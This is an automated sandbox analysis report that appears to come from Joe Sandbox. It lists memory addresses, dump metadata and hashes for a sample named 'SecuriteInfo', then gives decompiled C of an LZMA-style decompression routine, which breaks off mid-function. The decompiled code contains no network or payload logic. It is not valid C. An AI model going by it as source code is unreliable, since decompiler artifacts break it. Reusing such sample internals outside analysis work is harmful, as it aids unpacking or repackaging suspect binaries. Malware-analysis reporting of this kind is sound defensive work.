                                                                                    0x0040722e
                                                                                    0x0040722e
                                                                                    0x00407232
                                                                                    0x0040725e
                                                                                    0x00407260
                                                                                    0x00407267
                                                                                    0x0040726a
                                                                                    0x0040726d
                                                                                    0x0040726d
                                                                                    0x00407272
                                                                                    0x00407272
                                                                                    0x00407274
                                                                                    0x00407277
                                                                                    0x0040727e
                                                                                    0x00407281
                                                                                    0x004072ae
                                                                                    0x004072ae
                                                                                    0x004072b1
                                                                                    0x004072b4
                                                                                    0x00407328
                                                                                    0x00407328
                                                                                    0x00407328
                                                                                    0x00000000
                                                                                    0x00407328
                                                                                    0x004072b6
                                                                                    0x004072bc
                                                                                    0x004072bf
                                                                                    0x004072c2
                                                                                    0x004072c5
                                                                                    0x004072c8
                                                                                    0x004072cb
                                                                                    0x004072ce
                                                                                    0x004072d1
                                                                                    0x004072d4
                                                                                    0x004072d7
                                                                                    0x004072f0
                                                                                    0x004072f2
                                                                                    0x004072f5
                                                                                    0x004072f6
                                                                                    0x004072f9
                                                                                    0x004072fb
                                                                                    0x004072fe
                                                                                    0x00407300
                                                                                    0x00407302
                                                                                    0x00407305
                                                                                    0x00407307
                                                                                    0x0040730a
                                                                                    0x0040730e
                                                                                    0x00407310
                                                                                    0x00407310
                                                                                    0x00407311
                                                                                    0x00407314
                                                                                    0x00407317
                                                                                    0x004072d9
                                                                                    0x004072d9
                                                                                    0x004072e1
                                                                                    0x004072e6
                                                                                    0x004072e8
                                                                                    0x004072eb
                                                                                    0x004072eb
                                                                                    0x0040731a
                                                                                    0x00407321
                                                                                    0x004072ab
                                                                                    0x004072ab
                                                                                    0x004072ab
                                                                                    0x004072ab
                                                                                    0x00000000
                                                                                    0x00407323
                                                                                    0x00000000
                                                                                    0x00407323
                                                                                    0x00407321
                                                                                    0x00407234
                                                                                    0x00407237
                                                                                    0x00407239
                                                                                    0x0040723c
                                                                                    0x0040723f
                                                                                    0x00407242
                                                                                    0x00407244
                                                                                    0x00407247
                                                                                    0x0040724a
                                                                                    0x0040724a
                                                                                    0x0040724d
                                                                                    0x0040724d
                                                                                    0x00407250
                                                                                    0x00407257
                                                                                    0x0040722b
                                                                                    0x0040722b
                                                                                    0x0040722b
                                                                                    0x0040722b
                                                                                    0x00000000
                                                                                    0x00407259
                                                                                    0x00000000
                                                                                    0x00407259
                                                                                    0x00407257
                                                                                    0x004071dd
                                                                                    0x004071e0
                                                                                    0x004071e2
                                                                                    0x004071e5
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406f44
                                                                                    0x00406f44
                                                                                    0x00406f48
                                                                                    0x0040758d
                                                                                    0x00000000
                                                                                    0x0040758d
                                                                                    0x00406f4e
                                                                                    0x00406f51
                                                                                    0x00406f54
                                                                                    0x00406f57
                                                                                    0x00406f5a
                                                                                    0x00406f5d
                                                                                    0x00406f60
                                                                                    0x00406f62
                                                                                    0x00406f65
                                                                                    0x00406f68
                                                                                    0x00406f6b
                                                                                    0x00406f6d
                                                                                    0x00406f6d
                                                                                    0x00406f6d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004070cf
                                                                                    0x004070cf
                                                                                    0x004070d3
                                                                                    0x00407599
                                                                                    0x00000000
                                                                                    0x00407599
                                                                                    0x004070d9
                                                                                    0x004070dc
                                                                                    0x004070df
                                                                                    0x004070e2
                                                                                    0x004070e4
                                                                                    0x004070e4
                                                                                    0x004070e4
                                                                                    0x004070e7
                                                                                    0x004070ea
                                                                                    0x004070ed
                                                                                    0x004070f0
                                                                                    0x004070f3
                                                                                    0x004070f6
                                                                                    0x004070f7
                                                                                    0x004070f9
                                                                                    0x004070f9
                                                                                    0x004070f9
                                                                                    0x004070fc
                                                                                    0x004070ff
                                                                                    0x00407102
                                                                                    0x00407105
                                                                                    0x00407105
                                                                                    0x00407105
                                                                                    0x00407108
                                                                                    0x0040710a
                                                                                    0x0040710a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040734c
                                                                                    0x0040734c
                                                                                    0x0040734c
                                                                                    0x00407350
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407356
                                                                                    0x00407359
                                                                                    0x0040735c
                                                                                    0x0040735f
                                                                                    0x00407361
                                                                                    0x00407361
                                                                                    0x00407361
                                                                                    0x00407364
                                                                                    0x00407367
                                                                                    0x0040736a
                                                                                    0x0040736d
                                                                                    0x00407370
                                                                                    0x00407373
                                                                                    0x00407374
                                                                                    0x00407376
                                                                                    0x00407376
                                                                                    0x00407376
                                                                                    0x00407379
                                                                                    0x0040737c
                                                                                    0x0040737f
                                                                                    0x00407382
                                                                                    0x00407385
                                                                                    0x00407389
                                                                                    0x0040738b
                                                                                    0x0040738e
                                                                                    0x00000000
                                                                                    0x00407390
                                                                                    0x0040710d
                                                                                    0x0040710d
                                                                                    0x00000000
                                                                                    0x0040710d
                                                                                    0x0040738e
                                                                                    0x004075c3
                                                                                    0x004075e5
                                                                                    0x004075eb
                                                                                    0x004075ed
                                                                                    0x004075f4
                                                                                    0x004075f6
                                                                                    0x004075fd
                                                                                    0x00407601
                                                                                    0x00000000
                                                                                    0x00406bf2
                                                                                    0x004075fa
                                                                                    0x004075fa
                                                                                    0x00000000
                                                                                    0x004075fa
                                                                                    0x00407447
                                                                                    0x004074cd
                                                                                    0x004074d3
                                                                                    0x004074d6
                                                                                    0x004074d9
                                                                                    0x004074dc
                                                                                    0x004074df
                                                                                    0x004074e2
                                                                                    0x004074e5
                                                                                    0x004074e8
                                                                                    0x004074ee
                                                                                    0x00407507
                                                                                    0x0040750a
                                                                                    0x0040750d
                                                                                    0x00407510
                                                                                    0x00407514
                                                                                    0x00407516
                                                                                    0x00407517
                                                                                    0x0040751a
                                                                                    0x004074f0
                                                                                    0x004074f0
                                                                                    0x004074f8
                                                                                    0x004074fd
                                                                                    0x004074ff
                                                                                    0x00407502
                                                                                    0x00407502
                                                                                    0x00407524
                                                                                    0x00000000
                                                                                    0x00407526
                                                                                    0x00000000
                                                                                    0x00407526
                                                                                    0x00407524
                                                                                    0x00000000
                                                                                    0x00407399

                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                                                                    • Instruction ID: d49815ad38d406b3cd0a1a90ea7be1526168d9e39684835ffa6a026ef1ef4849
                                                                                    • Opcode Fuzzy Hash: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                                                                    • Instruction Fuzzy Hash: 91913270D04228DBEF28CF98C8547ADBBB1FF44305F14816AD856BB281D778A986DF45
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004070AB Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 98%
                                                                                    			E004070AB() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M00407602))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
